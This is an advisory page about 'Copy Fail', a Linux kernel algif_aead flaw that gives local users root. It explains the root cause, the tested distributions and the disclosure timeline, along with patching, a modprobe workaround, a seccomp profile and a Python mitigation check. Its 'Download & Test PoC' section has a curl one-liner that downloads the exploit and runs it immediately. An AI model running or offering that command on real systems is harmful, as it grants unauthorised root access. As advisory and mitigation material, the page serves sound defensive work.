Copy Fail

A straight-line logic flaw in the Linux kernel that allows any unprivileged user to gain root access.

CVSS: 7.8 (High) | CISA KEV

Understanding the Threat

Discovered: March 23, 2026 (Public: April 29, 2026)
Researcher: Taeyang Lee (Theori / Xint Code)

Copy Fail is a logic flaw in the Linux kernel's algif_aead crypto subsystem. Unlike most Linux privilege escalations that require race conditions or kernel-specific offsets, Copy Fail works reliably in a single execution — no races, no offsets, no kernel debugging.

The vulnerability has existed since 2017, affecting essentially every mainstream Linux distribution shipped since then. A mere 732-byte Python script can root any vulnerable system.

Attack Diagram

[Figure 1: Copy Fail Attack Path]

🚨 Why This Matters

  • 100% reliable — No race windows, no timing dependencies
  • Since 2017 — Nine years of affected systems
  • 732 bytes — Smaller than most logo images
  • No dependencies — Python 3.10+ stdlib only
  • CISA KEV — Added to Known Exploited Vulnerabilities catalog

Am I Vulnerable?

If you have an unprivileged user account on a Linux system, you can likely gain root. The vulnerability affects any Linux kernel built between 2017 and the patch date.

⚠️ No Simple Detection Method

There is no reliable one-liner to detect if your kernel is vulnerable. The safest assumption is that any kernel from 2017 to the patched date is vulnerable. Check your distribution's security advisories.

Tested Distributions

Xint Code directly verified this exploit works on these distribution/kernel combinations. Any Linux kernel built between 2017 and the patched date is likely vulnerable.

Distribution       | Kernel Version            | Verified
Ubuntu 24.04 LTS   | 6.17.0-1007-aws           | Root achieved
Amazon Linux 2023  | 6.18.8-9.213.amzn2023     | Root achieved
RHEL 10.1          | 6.12.0-124.45.1.el10_1    | Root achieved
SUSE 16            | 6.12.0-160000.9-default   | Root achieved

Technical Details

The vulnerability exists at the intersection of three kernel changes:

  1. authencesn (2011) — An AEAD wrapper for IPsec that uses the caller's destination buffer as scratch space for ESN byte rearrangement. Writes 4 bytes at offset assoclen + cryptlen past the output boundary.
  2. AF_ALG AEAD (2015) — Added AEAD support to the kernel's userspace crypto interface.
  3. In-place optimization (2017) — Commit 72548b093ee3 changed algif_aead to operate in-place, chaining page cache pages (from splice()) into the writable destination scatterlist.

The Flaw

When using AF_ALG with splice(), page cache pages of any readable file can be delivered to the crypto scatterlist. In-place operation chains these pages into the writable destination. authencesn's scratch write at dst[assoclen + cryptlen] then writes directly into the kernel's page cache of that file — the in-memory version that gets read on execution.

  • Multi-tenant Linux hosts — Shared dev boxes, jump hosts, build servers
  • Kubernetes clusters — Page cache is shared across the host; pod can compromise node
  • CI runners — GitHub Actions, GitLab runners executing untrusted PR code
  • Cloud SaaS — Notebook hosts, agent sandboxes, serverless functions

Download & Test PoC

Terminal
curl -fsSL https://copy.fail/exp -o poc.py && python3 poc.py

SHA256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9

How to Fix

1. Patch the Kernel

Update your distribution's kernel package to include mainline commit a664bf3d603d. Most major distributions are shipping the fix.

Ubuntu/Debian
sudo apt update && sudo apt upgrade linux-image-generic
RHEL/CentOS/Fedora
sudo dnf update kernel
Amazon Linux
sudo dnf update kernel-6.18

2. Workaround: Disable algif_aead (Before Patching)

If you cannot patch immediately, disable the vulnerable kernel module:

Terminal
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead

What breaks? Almost nothing. AF_ALG is rarely used in practice. Disabling algif_aead does not affect dm-crypt/LUKS, SSH, kTLS, IPsec, or OpenSSL defaults. Only applications that explicitly use the AF_ALG interface for AEAD operations (for example OpenSSL's afalg engine) are affected.

3. Container & Sandbox Mitigation

For untrusted workloads, block AF_ALG socket creation via seccomp regardless of patch state:

seccomp profile (OCI / Docker JSON format)
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["socket"],
      "action": "SCMP_ACT_ERRNO",
      "args": [
        { "index": 0, "value": 38, "op": "SCMP_CMP_EQ" }
      ]
    }
  ]
}

AF_ALG is address family 38, the first argument of socket(2); SCMP_ACT_ERRNO makes such calls fail with EPERM. Merge the syscalls entry into the default profile you already apply to the workload rather than deploying this allow-by-default skeleton on its own.
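An added check, written for this page and not taken from the Copy Fail PoC or the kernel tree, that verifies steps 2 and 3 on a host: it parses modprobe configuration for the install rule and tries to bind an AF_ALG aead socket, the operation both the modprobe rule and the seccomp profile are meant to deny. The function names and status strings are my own convention.

```python
import errno
import socket

# Added check (not from the Copy Fail PoC or the kernel tree): does this host
# actually refuse AF_ALG AEAD sockets? Status strings are my own convention:
#   "blocked"     AF_ALG aead socket cannot be created or bound
#   "available"   algif_aead loads and binds, so the workaround is NOT in effect
#   "unsupported" this Python build has no AF_ALG (non-Linux host)
#   "unknown"     an errno this helper does not classify

def status_for_errno(code: int) -> str:
    """Map the errno from socket() or bind() to a mitigation status."""
    blocked = {
        errno.EAFNOSUPPORT,  # AF_ALG family not registered at all
        errno.EPERM,         # seccomp SCMP_ACT_ERRNO (or an LSM) denied socket()
        errno.EACCES,
        errno.ENOENT,        # "aead" type unresolvable: algif_aead did not load
    }
    return "blocked" if code in blocked else "unknown"

def algif_aead_status(alg_name: str = "gcm(aes)") -> str:
    """Bind an AF_ALG 'aead' socket. The bind is what makes the kernel call
    request_module() for algif_aead, so both the modprobe install rule and a
    seccomp deny on socket(AF_ALG, ...) show up here as an error."""
    family = getattr(socket, "AF_ALG", None)
    if family is None:
        return "unsupported"
    try:
        sock = socket.socket(family, socket.SOCK_SEQPACKET, 0)
    except OSError as exc:
        return status_for_errno(exc.errno)
    try:
        sock.bind(("aead", alg_name))  # gcm(aes) ships in every mainstream kernel
    except OSError as exc:
        return status_for_errno(exc.errno)
    finally:
        sock.close()
    return "available"

def modprobe_disables_algif_aead(conf_text: str) -> bool:
    """True if a modprobe.d file carries 'install algif_aead <command>'.
    A bare 'blacklist algif_aead' line is not sufficient: blacklist only
    disables the module's aliases, and the kernel requests 'algif-aead'
    by its real module name, so the module would still load on demand."""
    for line in conf_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 3 and fields[:2] == ["install", "algif_aead"]:
            return True
    return False
```

Run algif_aead_status() on the host after step 2, or inside the sandboxed workload after step 3; a result of "available" means the mitigation is not in effect where the code ran.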

Critical: Reboot Required

Kernel patches require a system reboot to take effect. Simply upgrading the package is not enough — you must restart the server.

Disclosure Timeline

2026-03-23: Reported to Linux kernel security team
2026-03-24: Initial acknowledgment
2026-03-25: Patches proposed and reviewed
2026-04-01: Patch committed to mainline
2026-04-22: CVE-2026-31431 assigned
2026-04-29: Public disclosure
2026-05-01: Added to CISA KEV catalog